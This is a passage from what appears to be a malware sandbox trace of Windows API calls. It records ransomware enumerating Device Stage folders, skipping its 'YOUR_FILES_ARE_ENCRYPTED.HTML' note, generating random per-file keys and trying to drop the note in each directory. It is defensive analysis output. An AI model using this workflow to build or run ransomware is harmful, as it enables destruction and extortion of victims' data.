ftLastWriteTime.dwHighDateTime=0x1c9ea14, nFileSizeHigh=0x0, nFileSizeLow=0x1fad1, dwReserved0=0x0, dwReserved1=0x60, cFileName="background.png", cAlternateFileName="")) returned 1 [0169.801] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png") returned 106 [0169.802] lstrcmpW (lpString1="background.png", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.802] PathFindExtensionW (pszPath="background.png") returned=".png" [0169.802] lstrlenW (lpString=".png") returned 4 [0169.802] PathFindExtensionW (pszPath="background.png") returned=".png" [0169.802] SystemFunction036 (in: RandomBuffer=0x4ebd4e0, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd4e0) returned 1 [0169.802] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0xffffffff [0169.802] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x64cf1c24, ftCreationTime.dwHighDateTime=0x1ca0409, ftLastAccessTime.dwLowDateTime=0x64cf1c24, ftLastAccessTime.dwHighDateTime=0x1ca0409, ftLastWriteTime.dwLowDateTime=0x2a06b8bc, ftLastWriteTime.dwHighDateTime=0x1c9ea14, nFileSizeHigh=0x0, nFileSizeLow=0x769, dwReserved0=0x0, dwReserved1=0x60, cFileName="behavior.xml", cAlternateFileName="")) returned 1 [0169.802] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\behavior.xml") returned 104 [0169.802] lstrcmpW (lpString1="behavior.xml", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.802] PathFindExtensionW (pszPath="behavior.xml") returned=".xml" [0169.802] lstrlenW (lpString=".xml") returned 4 [0169.802] PathFindExtensionW (pszPath="behavior.xml") returned=".xml" [0169.802] SystemFunction036 (in: RandomBuffer=0x4ebd4e0, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd4e0) returned 1 [0169.802] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\behavior.xml" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\behavior.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0xffffffff [0169.802] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x64d3dee4, ftCreationTime.dwHighDateTime=0x1ca0409, ftLastAccessTime.dwLowDateTime=0x64d3dee4, ftLastAccessTime.dwHighDateTime=0x1ca0409, ftLastWriteTime.dwLowDateTime=0x2a2ccebc, ftLastWriteTime.dwHighDateTime=0x1c9ea14, nFileSizeHigh=0x0, nFileSizeLow=0x70c1, dwReserved0=0x0, dwReserved1=0x60, cFileName="watermark.png", cAlternateFileName="")) returned 1 [0169.802] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png") returned 105 [0169.803] lstrcmpW (lpString1="watermark.png", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.803] PathFindExtensionW (pszPath="watermark.png") returned=".png" [0169.803] lstrlenW (lpString=".png") returned 4 [0169.803] PathFindExtensionW (pszPath="watermark.png") returned=".png" [0169.803] SystemFunction036 (in: RandomBuffer=0x4ebd4e0, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd4e0) returned 1 [0169.803] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0xffffffff [0169.803] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcbaa7760, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcbaa7760, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbaa7760, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0169.803] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 121 [0169.803] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0169.803] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcbaa7760, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcbaa7760, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbaa7760, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0169.803] FindClose (in: hFindFile=0x42f3200 | out: hFindFile=0x42f3200) returned 1 [0169.803] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 121 [0169.803] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0169.803] GetProcessHeap () returned 0x270000 [0169.804] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73f0050 | out: hHeap=0x270000) returned 1 [0169.804] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9e978d9, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xcbaa7760, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbaa7760, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="{8702d817-5aad-4674-9ef3-4d3decd87120}", cAlternateFileName="{8702D~1")) returned 0 [0169.804] FindClose (in: hFindFile=0x42f31c0 | out: hFindFile=0x42f31c0) returned 1 [0169.804] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 82 [0169.804] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0169.804] GetProcessHeap () returned 0x270000 [0169.805] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73e0048 | out: hHeap=0x270000) returned 1 [0169.805] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf9e978d9, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xcbb19b80, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbb19b80, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Task", cAlternateFileName="")) returned 1 [0169.805] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task") returned 50 [0169.805] GetProcessHeap () returned 0x270000 [0169.805] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x73e0048 [0169.805] lstrcpyW (in: lpString1=0x73e0048, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task" [0169.805] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\*" [0169.805] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\*", lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf9e978d9, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xcbb19b80, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbb19b80, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f31c0 [0169.806] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf9e978d9, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xcbb19b80, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbb19b80, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0169.806] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcbb19b80, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcbb19b80, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbb19b80, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0169.806] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 80 [0169.806] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0169.806] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9e978d9, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xcbaf3a20, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbaf3a20, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}", cAlternateFileName="{07DEB~1")) returned 1 [0169.806] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}") returned 89 [0169.806] GetProcessHeap () returned 0x270000 [0169.806] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x73f0050 [0169.806] lstrcpyW (in: lpString1=0x73f0050, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}" [0169.806] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\*" [0169.806] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\*", lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9e978d9, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xcbaf3a20, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbaf3a20, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3200 [0169.806] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9e978d9, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xcbaf3a20, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbaf3a20, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0169.806] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x917f121e, ftCreationTime.dwHighDateTime=0x1cbf8b7, ftLastAccessTime.dwLowDateTime=0xcbacd8c0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbacd8c0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="en-US", cAlternateFileName="")) returned 1 [0169.806] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US") returned 95 [0169.806] GetProcessHeap () returned 0x270000 [0169.806] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x75e0048 [0169.809] lstrcpyW (in: lpString1=0x75e0048, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US" [0169.809] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\*" [0169.809] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\*", lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x917f121e, ftCreationTime.dwHighDateTime=0x1cbf8b7, ftLastAccessTime.dwLowDateTime=0xcbacd8c0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbacd8c0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3240 [0169.809] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x917f121e, ftCreationTime.dwHighDateTime=0x1cbf8b7, ftLastAccessTime.dwLowDateTime=0xcbacd8c0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbacd8c0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0169.809] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x83da3d14, ftCreationTime.dwHighDateTime=0x1cbf8b7, ftLastAccessTime.dwLowDateTime=0x842daf62, ftLastAccessTime.dwHighDateTime=0x1cbf8b7, ftLastWriteTime.dwLowDateTime=0x83da3d14, ftLastWriteTime.dwHighDateTime=0x1cbf8b7, nFileSizeHigh=0x0, nFileSizeLow=0x536, dwReserved0=0x0, dwReserved1=0x60, cFileName="resource.xml", cAlternateFileName="")) returned 1 [0169.809] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\resource.xml") returned 108 [0169.809] lstrcmpW (lpString1="resource.xml", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.810] PathFindExtensionW (pszPath="resource.xml") returned=".xml" [0169.810] lstrlenW (lpString=".xml") returned 4 [0169.810] PathFindExtensionW (pszPath="resource.xml") returned=".xml" [0169.810] SystemFunction036 (in: RandomBuffer=0x4ebd1d4, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd1d4) returned 1 [0169.810] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\resource.xml" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-us\\resource.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0xffffffff [0169.810] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcbacd8c0, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcbacd8c0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbaf3a20, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0169.810] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 125 [0169.810] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0169.810] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcbacd8c0, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcbacd8c0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbaf3a20, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0169.810] FindClose (in: hFindFile=0x42f3240 | out: hFindFile=0x42f3240) returned 1 [0169.810] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 125 [0169.810] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-us\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0169.810] GetProcessHeap () returned 0x270000 [0169.811] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75e0048 | out: hHeap=0x270000) returned 1 [0169.811] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x647bcc04, ftCreationTime.dwHighDateTime=0x1ca0409, ftLastAccessTime.dwLowDateTime=0x647bcc04, ftLastAccessTime.dwHighDateTime=0x1ca0409, ftLastWriteTime.dwLowDateTime=0x112e5ebc, ftLastWriteTime.dwHighDateTime=0x1c9ea14, nFileSizeHigh=0x0, nFileSizeLow=0xd0a3, dwReserved0=0x0, dwReserved1=0x60, cFileName="folder.ico", cAlternateFileName="")) returned 1 [0169.811] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\folder.ico") returned 100 [0169.811] lstrcmpW (lpString1="folder.ico", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.811] PathFindExtensionW (pszPath="folder.ico") returned=".ico" [0169.811] lstrlenW (lpString=".ico") returned 4 [0169.811] PathFindExtensionW (pszPath="folder.ico") returned=".ico" [0169.811] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6487b2e4, ftCreationTime.dwHighDateTime=0x1ca0409, ftLastAccessTime.dwLowDateTime=0x6487b2e4, ftLastAccessTime.dwHighDateTime=0x1ca0409, ftLastWriteTime.dwLowDateTime=0x112e5ebc, ftLastWriteTime.dwHighDateTime=0x1c9ea14, nFileSizeHigh=0x0, nFileSizeLow=0x72ee, dwReserved0=0x0, dwReserved1=0x60, cFileName="netfol.ico", cAlternateFileName="")) returned 1 [0169.811] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\netfol.ico") returned 100 [0169.811] lstrcmpW (lpString1="netfol.ico", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.811] PathFindExtensionW (pszPath="netfol.ico") returned=".ico" [0169.812] lstrlenW (lpString=".ico") returned 4 [0169.812] PathFindExtensionW (pszPath="netfol.ico") returned=".ico" [0169.812] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x647e2d64, ftCreationTime.dwHighDateTime=0x1ca0409, ftLastAccessTime.dwLowDateTime=0x647e2d64, ftLastAccessTime.dwHighDateTime=0x1ca0409, ftLastWriteTime.dwLowDateTime=0x113582dc, ftLastWriteTime.dwHighDateTime=0x1c9ea14, nFileSizeHigh=0x0, nFileSizeLow=0x14668, dwReserved0=0x0, dwReserved1=0x60, cFileName="pictures.ico", cAlternateFileName="")) returned 1 [0169.812] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\pictures.ico") returned 102 [0169.812] lstrcmpW (lpString1="pictures.ico", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.812] PathFindExtensionW (pszPath="pictures.ico") returned=".ico" [0169.812] lstrlenW (lpString=".ico") returned 4 [0169.812] PathFindExtensionW (pszPath="pictures.ico") returned=".ico" [0169.812] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x647bcc04, 